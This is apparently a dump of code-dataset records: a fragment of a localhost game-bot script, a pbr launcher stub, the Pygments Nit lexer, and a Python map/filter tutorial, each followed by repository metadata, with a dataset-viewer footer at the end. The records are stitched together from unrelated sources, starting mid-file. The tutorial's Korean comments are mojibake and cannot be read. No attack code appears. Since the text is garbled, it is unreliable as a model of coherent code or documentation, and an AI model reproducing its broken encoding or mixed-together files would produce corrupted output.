if lineos2["los"]:
requests.post('http://localhost:%s/api/player/actions' % portvariable, json={"type": "shoot","amount": 3})
""""
for i in range(2):
Aimbot("Barrel",list_obj)
"""
|
[
"noreply@github.com"
] |
noreply@github.com
|
6df2122e03a63d0522c49643951d554e7116ea72
|
7bb81c60a3e320b0dbbbb49ec68ae5b559b29618
|
/fun/bin/pbr
|
b86cad08914aab4ac6723c5e4365b9ac7922bb35
|
[
"MIT"
] |
permissive
|
vishaljain3991/flask_oauth_example_template
|
594714d7507057e5008f167f94aa451b288bfe22
|
50c73063178296de45c678f6a788ee63010b5a7c
|
refs/heads/master
| 2021-01-10T01:30:29.841247
| 2016-03-18T11:34:42
| 2016-03-18T11:34:42
| 54,195,986
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
#!/home/vj/flask-oauth-example-master/fun/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from pbr.cmd.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"vishaljainthebest@gmail.com"
] |
vishaljainthebest@gmail.com
|
|
97e8c0838b69c13d3f904330d4219b2d235fae39
|
a3c8d3e3f0d7704c6e0fcebe1667ae5cbfc9510f
|
/pygments/lexers/nit.py
|
ba2670868d5b409e4ffa17e420e44bbda0fcfad5
|
[
"BSD-2-Clause"
] |
permissive
|
sglyon/pygments
|
3946518ac79194394c8dbef1c28f5de9a99e8955
|
b89c13fd95362eb9197a4c7e893cbaced3514eee
|
refs/heads/master
| 2021-05-30T02:55:31.500066
| 2014-10-01T15:44:15
| 2014-10-01T15:44:15
| 24,683,763
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,747
|
py
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.nit
~~~~~~~~~~~~~~~~~~~
Lexer for the Nit language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['NitLexer']
class NitLexer(RegexLexer):
"""
For `nit <http://nitlanguage.org>`_ source.
.. versionadded:: 2.0
"""
name = 'Nit'
aliases = ['nit']
filenames = ['*.nit']
tokens = {
'root': [
(r'#.*?$', Comment.Single),
(words((
'package', 'module', 'import', 'class', 'abstract', 'interface',
'universal', 'enum', 'end', 'fun', 'type', 'init', 'redef',
'isa', 'do', 'readable', 'writable', 'var', 'intern', 'extern',
'public', 'protected', 'private', 'intrude', 'if', 'then',
'else', 'while', 'loop', 'for', 'in', 'and', 'or', 'not',
'implies', 'return', 'continue', 'break', 'abort', 'assert',
'new', 'is', 'once', 'super', 'self', 'true', 'false', 'nullable',
'null', 'as', 'isset', 'label', '__debug__'), suffix='(?=( |\n|\t|\r|\())'),
Keyword),
(r'[A-Z][A-Za-z0-9_]*', Name.Class),
(r'"""(([^\'\\]|\\.)|\\r|\\n)*(({{?)?(""?{{?)*""""*)', String), # Simple long string
(r'\'\'\'(((\\.|[^\'\\])|\\r|\\n)|\'((\\.|[^\'\\])|\\r|\\n)|'
r'\'\'((\\.|[^\'\\])|\\r|\\n))*\'\'\'', String), # Simple long string alt
(r'"""(([^\'\\]|\\.)|\\r|\\n)*((""?)?({{?""?)*{{{{*)', String), # Start long string
(r'}}}(((\\.|[^\'\\])|\\r|\\n))*(""?)?({{?""?)*{{{{*', String), # Mid long string
(r'}}}(((\\.|[^\'\\])|\\r|\\n))*({{?)?(""?{{?)*""""*', String), # End long string
(r'"(\\.|([^"}{\\]))*"', String), # Simple String
(r'"(\\.|([^"}{\\]))*{', String), # Start string
(r'}(\\.|([^"}{\\]))*{', String), # Mid String
(r'}(\\.|([^"}{\\]))*"', String), # End String
(r'(\'[^\'\\]\')|(\'\\.\')', String.Char),
(r'[0-9]+', Number.Integer),
(r'[0-9]*.[0-9]+', Number.Float),
(r'0(x|X)[0-9A-Fa-f]+', Number.Hex),
(r'[a-z][A-Za-z0-9_]*', Name),
(r'_[A-Za-z0-9_]+', Name.Variable.Instance),
(r'==|!=|<==>|>=|>>|>|<=|<<|<|\+|-|=|/|\*|%|\+=|-=|!|@', Operator),
(r'\(|\)|\[|\]|,|\.\.\.|\.\.|\.|::|:', Punctuation),
(r'`{[^`]*`}', Text), # Extern blocks won't be Lexed by Nit
('(\r|\n| |\t)+', Text),
],
}
|
[
"georg@python.org"
] |
georg@python.org
|
6c3946f36f0aed60cdcca6cdfad7f2b5c603db1b
|
0e48d3bfc41ad48bc4b87e89d57d3da38c368c3a
|
/02day/Func15.py
|
1fbe1a7c3dc1bca1a05abe05442f89dfc0c23150
|
[] |
no_license
|
pdm2017/PySrc
|
08faeac90d0da5a022340723721e4a0f11d9d570
|
8da7255a7b4fe010ddb4443e654579492af882b8
|
refs/heads/master
| 2022-02-19T23:54:57.807733
| 2019-09-27T06:02:10
| 2019-09-27T06:02:10
| 208,995,737
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 879
|
py
|
# Func15.py
def pow(x): return x**2
a = [1,2,3,4,5,6,7,8,9,10]
b = list(map(pow,a))
print(b)
c = list(map(lambda x:x*100,a))
print(c)
d = [ i + 100 for i in a ]
print(d)
# a์์ ์ง์๊ฐ๋ง ์ ๊ณฑ๊ฐ, ํ์๋ ๊ทธ๋๋ก --> LC ํํ
e = [ i**2 if i%2==0 else i for i in a ]; print(e)
# a์์ ์ง์๊ฐ๋ง ์ ๊ณฑ๊ฐ, ํ์๋ ๊ทธ๋๋ก --> map ํจ์
f = list(map(lambda i:i**2 if i%2 == 0 else i,a)); print(f)
# a์์ ํ์๊ฐ๋ง ์๋๊ฐ:์ ๊ณฑ๊ฐ --> LC ํํ
g = { i:i**2 for i in a if i%2 }; print(g)
# a์์ ์ง์๋ ์๋๊ฐ:์ ๊ณฑ๊ฐ , ํ์๋ ์๋๊ฐ:0 --> LC ํํ
h = dict(map(lambda i:(i,i**2) if i%2 == 0 else (i,0),a)); print(h)
# Filter( )
y = [1,2,3,4,5,6,7,8,9,10,15,20]
def f1(x): return (x>5) and ( (x%2)==1 )
#z = list(filter(f1,y))
z = list(filter(lambda x : (x>5) and (x%2)==1,y))
print(z)
|
[
"noreply@github.com"
] |
noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.